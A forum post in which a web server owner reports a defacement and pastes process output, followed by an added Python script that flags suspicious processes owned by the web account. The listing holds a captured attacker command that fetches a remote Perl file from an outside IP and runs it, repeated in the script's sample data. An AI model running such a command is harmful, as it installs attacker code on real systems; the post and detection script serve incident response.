Hi guys,
I was trying to check my email this morning when I realized my mail server was down. I go to check my website and see "exlab ownz!" written on my main page. I restarted my mail server, then checked around to see if anything else was damaged. Apparently the punk only changed the index.php, but I'm not sure what else he might have done. I did a "ps -aux" and got:
nobody 2715 0.0 1.9 18268 9692 ? S May20 0:00 /usr/local/apache2/bin/httpd -k start
nobody 2986 0.0 1.9 18212 9684 ? S May20 0:05 /usr/local/apache2/bin/httpd -k start
nobody 2988 0.0 1.9 18340 9864 ? S May20 0:08 /usr/local/apache2/bin/httpd -k start
nobody 3000 0.0 0.0 0 0 ? Z May20 0:00 [sh] <defunct>
nobody 3002 0.0 0.6 7312 3516 ? S May20 0:00 /usr/local/apache/bin/httpd -DSSL
nobody 13238 0.0 0.2 4464 1060 ? S May20 0:00 sh -c wget http://213.251.163.94//squirrelmail/src/ping.txt;mv ping.txt temp2006;perl temp2006
nobody 21173 0.0 2.3 20656 12144 ? S 07:13 0:00 /usr/local/apache2/bin/httpd -k start
Some of this stuff seems unusual.
If anybody has any insight on how to stop this, I would appreciate it.
I would also appreciate suggestions on how to prevent this from happening again.
Thanks
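
Added example, not part of the original post: a small triage pass over "ps aux" output that lists every process owned by the web server account that is not the expected httpd binary, which is the pattern visible in the listing above. The function name, the reason labels, the expected binary path and the placeholder download host are assumptions; the sample lines are constructed, modelled on the post.

```python
import re

# Constructed sample modelled on the listing in the post.
# host.invalid is a placeholder, not a value from the page.
SAMPLE_PS = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 1500 500 ? S May19 0:03 init
nobody 2715 0.0 1.9 18268 9692 ? S May20 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3000 0.0 0.0 0 0 ? Z May20 0:00 [sh] <defunct>
nobody 3002 0.0 0.6 7312 3516 ? S May20 0:00 /usr/local/apache/bin/httpd -DSSL
nobody 13238 0.0 0.2 4464 1060 ? S May20 0:00 sh -c wget http://host.invalid/ping.txt;mv ping.txt temp2006;perl temp2006
nobody 21173 0.0 2.3 20656 12144 ? S 07:13 0:00 /usr/local/apache2/bin/httpd -k start
"""

SHELLS = {"sh", "bash", "dash", "ksh", "csh"}
FETCHERS = {"wget", "curl", "fetch", "lynx"}
INTERPRETERS = {"perl", "python", "php", "ruby"}


def triage(ps_text, web_user="nobody",
           expected_bin="/usr/local/apache2/bin/httpd"):
    """Return [(pid, [reasons])] for web_user processes worth a closer look."""
    findings = []
    for line in ps_text.splitlines():
        # ps aux has 10 fixed columns; the 11th is the full command line.
        fields = line.split(None, 10)
        if len(fields) < 11 or fields[0] != web_user:
            continue
        pid, stat, command = int(fields[1]), fields[7], fields[10]
        argv0 = command.split()[0]
        if argv0 == expected_bin and not stat.startswith("Z"):
            continue  # ordinary worker of the expected server binary
        words = set(re.split(r"[\s;|&]+", command))
        reasons = []
        if stat.startswith("Z"):
            reasons.append("zombie")            # child was spawned, then exited
        if argv0.strip("[]").rsplit("/", 1)[-1] in SHELLS:
            reasons.append("shell")             # web account running a shell
        if words & FETCHERS:
            reasons.append("download")          # fetching a remote file
        if words & INTERPRETERS:
            reasons.append("interpreter")       # running a script
        if not reasons:
            reasons.append("unexpected-binary") # not the expected httpd path
        findings.append((pid, reasons))
    return findings


if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_PS):
        print(pid, ",".join(reasons))
```

A flag here means "verify", not "malicious": a second Apache install under a different path is reported as unexpected-binary simply because it differs from expected_bin.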